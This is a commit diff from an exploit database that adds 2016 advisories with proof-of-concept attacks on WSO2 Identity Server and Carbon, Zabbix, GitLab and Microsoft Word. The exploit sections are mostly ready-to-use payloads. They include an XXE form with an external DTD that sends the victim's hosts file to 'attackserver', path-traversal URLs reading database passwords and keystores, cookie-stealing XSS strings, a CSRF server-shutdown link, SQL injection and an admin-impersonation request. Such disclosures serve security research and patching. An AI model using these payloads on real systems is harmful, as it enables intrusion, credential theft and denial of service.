DB: 2016-08-16

2016-08-16 20:39:41 +00:00 · 2016-08-16 20:39:41 +00:00 · 24a0e1921a
commit 24a0e1921a
parent 8c28728c9f
8 changed files with 1961 additions and 1324 deletions
--- a/files.csv
+++ b/files.csv
--- a/platforms/jsp/webapps/40239.txt
+++ b/platforms/jsp/webapps/40239.txt
@ -0,0 +1,135 @@
 [+] Credits: John Page aka HYP3RLINX
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:
 http://hyp3rlinx.altervista.org/advisories/WSO2-IDENTITY-SERVER-v5.1.0-XML-External-Entity.txt
 [+] ISR: ApparitionSec
 Vendor:
 =============
 www.wso2.com
 Product:
 ============================
 Wso2 Identity Server v5.1.0
 As the industry’s first enterprise identity bus (EIB), WSO2 Identity Server
 is the central backbone
 that connects and manages multiple identities across applications, APIs,
 the cloud, mobile, and Internet
 of Things devices, regardless of the standards on which they are based. The
 multi-tenant WSO2 Identity Server
 can be deployed directly on servers or in the cloud, and has the ability to
 propagate identities across geographical
 and enterprise borders in a connected business environment.
 Vulnerability Type:
 ============================
 XML External Entity / CSRF
 CVE Reference(s):
 ===================
 CVE-2016-4312 (XXE)
 CVE-2016-4311 (CSRF)
 Vulnerability Details:
 =====================
 WSO2IS XML parser is vulnerable to XXE attack in the XACML flow, this can
 be exploited when XML input containing a reference to an
 external entity is processed by a weakly configured XML parser. The attack
 leads to the disclosure and exfiltration of confidential
 data and arbitrary system files, denial of service, server side request
 forgery, port scanning from the perspective of the machine
 where the parser is located (localhost), and other system impacts.
 The exploit can be carried out locally by an internal malicious user or
 remote via CSRF if an authenticated user clicks an attacker
 supplied link or visits a evil webpage. In case of WSO2IS system files can
 be read / exfiltrated to the remote attackers server
 for safe keeping -_-
 References:
 https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0096
 Exploit code(s):
 ===============
 XXE POC, exfiltrate the victims Windows hosts file to our remote server.
 1) Form for the XXE POST request.
 <form  id='XXE' action="
 https://victim-server:9443/carbon/entitlement/eval-policy-submit.jsp?withPDP=false"
 method="post">
 <textarea rows="20" cols="100" name="txtRequest">
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE roottag [
 <!ENTITY % file SYSTEM "C:\Windows\System32\drivers\etc\hosts">
 <!ENTITY % dtd SYSTEM "http://attackserver:8080/payload.dtd">
 %dtd;]>
 <Request xmlns="urn:oasis:names:tc:xacml:3.0:core:schema:wd-17"
 CombinedDecision="false" ReturnPolicyIdList="false">
 <Attributes>
 <Attribute>&send;</Attribute>
 </Attributes>
 </Request>
 &lt;/textarea&gt;
 <input type="hidden" name="forwardTo" value="eval-policy.jsp">
 <script>document.getElementById('XXE').submit()</script>
 </form>
 2) DTD file on attacker server.
 <?xml version="1.0" encoding="UTF-8"?>
 <!ENTITY % all "<!ENTITY send SYSTEM 'http://attackserver:8080?%file;'>">
 %all;
 3) On attack server create listener for the victims HTTP request.
 python -m SimpleHTTPServer 8080
 Disclosure Timeline:
 ============================================
 Vendor Notification: May 6, 2016
 Vendor Acknowledgement: May 6, 2016
 Vendor Fix / Customer Alerts: June 30, 2016
 August 12, 2016  : Public Disclosure
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ===============
 High
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no
 warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory,
 provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in
 vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the
 information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author
 prohibits any malicious use of security related information
 or exploits by the author or elsewhere.
 HYP3RLINX
--- a/platforms/jsp/webapps/40240.txt
+++ b/platforms/jsp/webapps/40240.txt
@ -0,0 +1,120 @@
 [+] Credits: John Page aka HYP3RLINX
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:
 http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-LOCAL-FILE-INCLUSION.txt
 [+] ISR: ApparitionSec
 Vendor:
 ===============
 www.wso2.com
 Product:
 ====================
 Ws02Carbon v4.4.5
 WSO2 Carbon is the core platform on which WSO2 middleware products are
 built. It is based on Java OSGi technology, which allows
 components to be dynamically installed, started, stopped, updated, and
 uninstalled, and it eliminates component version conflicts.
 In Carbon, this capability translates into a solid core of common
 middleware enterprise components, including clustering, security,
 logging, and monitoring, plus the ability to add components for specific
 features needed to solve a specific enterprise scenario.
 Vulnerability Type:
 =========================
 Local File Inclusion (LFI)
 CVE Reference:
 ==============
 CVE-2016-4314
 Vulnerability Details:
 =====================
 An authenticated user can download configuration files in the filesystem
 via downloadArchivedLogFiles operation in LogViewer admin service.
 The request to the admin service accepts a file path relative to the carbon
 log file directory (i.e. <WSO2_PRODUCT_HOME>/repository/logs)
 hence can access any file in the file system.
 References:
 https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0098
 Example: accessing the registry.xml file via Local File Inclusion exposes
 the MySQL passwords.
 <currentDBConfig>mysql-db</currentDBConfig>
 <dbConfig name="mysql-db">
 <url>jdbc:mysql://localhost:3306/regdb</url>
 <userName>regadmin</userName>
 <password>regadmin</password>
 <driverName>com.mysql.jdbc.Driver</driverName>
 <maxActive>80</maxActive>
 <maxWait>6000</maxWait>
 <minIdle>5</minIdle>
 </dbConfig>
 Exploit code(s):
 ===============
 LFI to read Database creds, truststore key file, web.xml etc...
 1) Read MySQL creds
 https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml&tenantDomain=&serviceName=
 2) Read MySQL creds
 https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/datasources/master-datasources.xml
 3) Access Truststore Key file.
 https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/resources/security/client-truststore.jks
 4) Read web.xml
 https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/tomcat/carbon/WEB-INF/web.xml
 Disclosure Timeline:
 ===========================================
 Vendor Notification: May 6, 2016
 Vendor Acknowledgement: May 6, 2016
 Vendor Fix / Customer Alerts: June 30, 2016
 August 12, 2016  : Public Disclosure
 Exploitation Technique:
 =======================
 Local
 Severity Level:
 ===============
 High
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no
 warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory,
 provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in
 vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the
 information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author
 prohibits any malicious use of security related information
 or exploits by the author or elsewhere.
 HYP3RLINX
--- a/platforms/jsp/webapps/40241.txt
+++ b/platforms/jsp/webapps/40241.txt
@ -0,0 +1,125 @@
 [+] Credits: John Page aka HYP3RLINX
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-PERSISTENT-XSS-COOKIE-THEFT.txt
 [+] ISR: ApparitionSec
 Vendor:
 =============
 www.wso2.com
 Product:
 ==================
 Ws02Carbon v4.4.5
 WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows
 components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts.
 In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security,
 logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario.
 Vulnerability Type:
 ===========================
 Persistent / Reflected
 Cross Site Scripting (XSS) - Cookie Disclosure
 CVE Reference:
 ==============
 CVE-2016-4316
 Vulnerability Details:
 =====================
 WSo2 Carbon has multiple XSS vectors allowing attackers to inject client-side scripts into web pages viewed by other users.
 A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy,
 stealing session cookies and used as a platform for further attacks on the system.
 Exploit code(s)
 ===============
 Persistent XSS:
 GET Request
 https://victim-server:9443/carbon/identity-mgt/challenges-mgt.jsp?addRowId=XSS&setName="/><script>alert(document.cookie)</script>
 Request two is POST
 /carbon/identity-mgt/challenges-mgt-finish.jsp
 setName=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&question0=&question1=City+where+you+were+born+%3F&setId1=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question1=City+where+you+were+born+%3F&question2=Father%27s+middle+name+%3F&setId2=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question2=Father%27s+middle+name+%3F&question3=Name+of+your+first+pet+%3F&setId3=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question3=Name+of+your+first+pet+%3F&question4=Favorite+sport+%3F&setId4=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question4=Favorite+sport+%3F&question5=Favorite+food+%3F&setId5=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question5=Favorite+food+%3F&question6=Favorite+vacation+location+%3F&setId6=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question6=Favorite+vacation+location+%3F&question7=Model+of+your+first+car+%3F&setId7=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question7=Model+of+your+first+car+%3F&question8=Name+of+the+hospital+where+you+were+born+%3F&setId8=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question8=Name+of+the+hospital+where+you+were+born+%3F&setId9=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&question9=XSS
 Then XSS payload will be listed here in below URL:
 https://victim-server:9443/carbon/identity-mgt/challenges-set-mgt.jsp?region=region1&item=identity_security_questions_menu
 Finally when victim clicks to "Delete" entry on the page the XSS is executed.
 Here is stored payload from the HTML source
 <a onclick="removeSet('\x22/><script>alert(666)</script>')" style='background-image:url(images/delete.gif);'  type="button" class="icon-link">Delete</a></td>
 ///////////////////////////////////////////////////////////////////////////////////////////////////////////
 Reflected XSS 
 XSS #1 
 https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war&webappState=all&hostName=victim-server&httpPort=9763&defaultHostName=victim-server&webappType=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E
 XSS #2 
 https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?dsName=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29&edit=HELL
 XSS #3
 https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?description=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29&edit=true
 XSS #4
 https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war&webappState=all&hostName=victim-server&httpPort=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E&defaultHostName=victim-server&webappType=
 XSS #5
 https://victim-server:9443/carbon/viewflows/handlers.jsp?retainlastbc=true&flow=in&phase=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
 XSS #6
 https://victim-server:9443/carbon/ndatasource/validateconnection-ajaxprocessor.jsp?&dsName=WSO2_CARBON_DB&driver=com.mysql.jdbc.Driver&url=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E&username=root&dsType=RDBMS&customDsType=RDBMS&dsProviderType=default&dsclassname=undefined&dsclassname=undefined&dsproviderProperties=undefined&editMode=false&changePassword=true&newPassword=
 Disclosure Timeline:
 ===========================================
 Vendor Notification: May 6, 2016
 Vendor Acknowledgement: May 6, 2016
 Vendor Fix / Customer Alerts: June 30, 2016
 August 12, 2016  : Public Disclosure
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ===============
 Medium
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere.
 HYP3RLINX
--- a/platforms/jsp/webapps/40242.txt
+++ b/platforms/jsp/webapps/40242.txt
@ -0,0 +1,103 @@
 [+] Credits: John Page aka HYP3RLINX
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-CSRF-DOS.txt
 [+] ISR: ApparitionSec
 Vendor:
 ============
 www.wso2.com
 Product:
 ==================
 Ws02Carbon v4.4.5
 WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows
 components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts.
 In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security,
 logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario.
 Vulnerability Type:
 =================================
 Cross Site Request Forgery / DOS
 CVE Reference:
 ==============
 CVE-2016-4315
 Vulnerability Details:
 =====================
 The attack involves tricking a privileged user to initiate a request by clicking a malicious link or visiting an evil webpage to
 shutdown WSO2 Servers.
 References:
 https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0101
 The getSafeText() Function and conditional logic below processes the "action" parameter with no check for inbound CSRF attacks.
 String cookie = (String) session.getAttribute(ServerConstants.ADMIN_SERVICE_COOKIE);
 String action = CharacterEncoder.getSafeText(request.getParameter("action"));
 ServerAdminClient client = new ServerAdminClient(ctx, backendServerURL, cookie, session);
 try {   
 if ("restart".equals(action)) {
    client.restart();
 } else if ("restartGracefully".equals(action)) {
   client.restartGracefully();
 } else if ("shutdown".equals(action)) {
     client.shutdown();
  } else if ("shutdownGracefully".equals(action)) {
      client.shutdownGracefully();
    }
 } catch (Exception e) {
  response.sendError(500, e.getMessage());
   return;
 }
 Exploit code(s):
 ===============
 Shutdown the Carbon server
 <a href="https://victim-server:9443/carbon/server-admin/proxy_ajaxprocessor.jsp?action=shutdown">Shut it down!</a>
 Disclosure Timeline:
 ==========================================
 Vendor Notification: May 6, 2016
 Vendor Acknowledgement: May 6, 2016
 Vendor Fix / Customer Alerts: June 30, 2016
 August 12, 2016  : Public Disclosure
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ================
 Medium
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere.
 HYP3RLINX
--- a/platforms/multiple/dos/40238.txt
+++ b/platforms/multiple/dos/40238.txt
@ -0,0 +1,63 @@
 #####################################################################################
 # Application: Microsoft Office Word
 # Platforms: Windows, OSX
 # Versions: Microsoft Office Word 2013,2016
 # Author: Francis Provencher of COSIG
 # Website: https://cosig.gouv.qc.ca/en/advisory/
 # Twitter: @COSIG_
 # Date: August 09, 2016
 # CVE: CVE-2016-3316
 # COSIG-2016-32
 #####################################################################################
 1) Introduction
 2) Report Timeline
 3) Technical details
 4) POC
 #######################################################################################
 ===================
 1) Introduction
 ===================
 Microsoft Word is a word processor developed by Microsoft. It was first released on October 25, 1983[3]
 under the name Multi-Tool Word for Xenix systems.[4][5][6] Subsequent versions were later written for several
 other platforms including IBM PCs running DOS (1983), Apple Macintosh running Mac OS (1985), AT&T Unix PC (1985),
 Atari ST (1988), OS/2 (1989), Microsoft Windows (1989) and SCO Unix (1994). Commercial versions of Word are licensed
 as a standalone product or as a component of Microsoft Office, Windows RT or the discontinued Microsoft Works suite.
 Microsoft Word Viewer and Office Online are Freeware editions of Word with limited features.
 (https://en.wikipedia.org/wiki/Microsoft_Word)
 #######################################################################################
 ===================
 2) Report Timeline
 ===================
 2016-05-15: Francis Provencher of COSIG report the vulnerability to MSRC.
 2016-06-07: MSRC confirm the vulnerability
 2016-08-09: Microsoft fixed the issue (MS16-099).
 2016-08-09: Advisory released.
 #######################################################################################
 ===================
 3) Technical details
 ===================
 The specific flaw exists within the parsing of invalid operand in “sprmSdyaTop” into a SEPX structure.
 An attacker can use this flaw to read outside the allocated buffer, which could allow for the execution of arbitrary code in the context of the current process.
 #######################################################################################
 ==========
 4) POC
 ==========
 https://cosig.gouv.qc.ca/wp-content/uploads/2016/08/COSIG-2016-32.doc
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40238.zip
 #######################################################################################
--- a/platforms/php/webapps/40237.txt
+++ b/platforms/php/webapps/40237.txt
@ -0,0 +1,49 @@
 ==========================================
 Title: Zabbix 3.0.3 SQL Injection Vulnerability
 Product: Zabbix
 Vulnerable Version(s): 2.2.x, 3.0.x
 Fixed Version: 3.0.4
 Homepage: http://www.zabbix.com 
 Patch link: https://support.zabbix.com/browse/ZBX-11023 
 Credit: 1N3@CrowdShield 
 ==========================================
 Vendor Description:
 =====================
 Zabbix is an open source availability and performance monitoring solution. 
 Vulnerability Overview:
 =====================
 Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the toggle_ids array in the latest.php page.
 Business Impact:
 =====================
 By exploiting this SQL injection vulnerability, an authenticated attacker (or guest user) is able to gain full access to the database. This would allow an attacker to escalate their privileges to a power user, compromise the database, or execute commands on the underlying database operating system.
 Because of the functionalities Zabbix offers, an attacker with admin privileges (depending on the configuration) can execute arbitrary OS commands on the configured Zabbix hosts and server. This results in a severe impact to the monitored infrastructure.
 Although the attacker needs to be authenticated in general, the system could also be at risk if the adversary has no user account. Zabbix offers a guest mode which provides a low privileged default account for users without password. If this guest mode is enabled, the SQL injection vulnerability can be exploited unauthenticated.
 Proof of Concept:
 =====================
 latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
 Result:
 SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1)
 latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185
 Disclosure Timeline:
 =====================
 7/18/2016 - Reported vulnerability to Zabbix
 7/21/2016 - Zabbix responded with permission to file CVE and to disclose after a patch is made public
 7/22/2016 - Zabbix released patch for vulnerability
 8/3/2016 - CVE details submitted
 8/11/2016 - Vulnerability details disclosed
--- a/platforms/ruby/webapps/40236.txt
+++ b/platforms/ruby/webapps/40236.txt
@ -0,0 +1,35 @@
 # Exploit Title: GitLab privilege escalation via "impersonate" feature
 # Date: 02-05-2016
 # Software Link: https://about.gitlab.com/
 # Version: 8.2.0 - 8.2.4, 8.3.0 - 8.3.8, 8.4.0 - 8.4.9, 8.5.0 - 8.5.11, 8.6.0 - 8.6.7, 8.7.0
 # Exploit Author: Kaimi
 # Website: https://kaimi.ru
 # CVE: CVE-2016-4340
 # Category: webapps
 1. Description
 Any registered user can "log in" as any other user, including administrators.
 https://about.gitlab.com/2016/05/02/cve-2016-4340-patches/
 2. Proof of Concept
 Login as regular user.
 Get current authenticity token by observing any POST-request (ex.: change any info in user profile).
 Craft request using this as template:
 POST /admin/users/stop_impersonation?id=root
 . . .
 _method=delete&authenticity_token=lqyOBt5U%2F0%2BPM2i%2BGDx3zaVjGgAqHzoteQ15FnrQ3E8%3D
 Where 'root' - desired user. 'authenticity_token' - token obtained on the previous step.
 3. Solution:
 Use officialy provided solutions:
 https://about.gitlab.com/2016/05/02/cve-2016-4340-patches/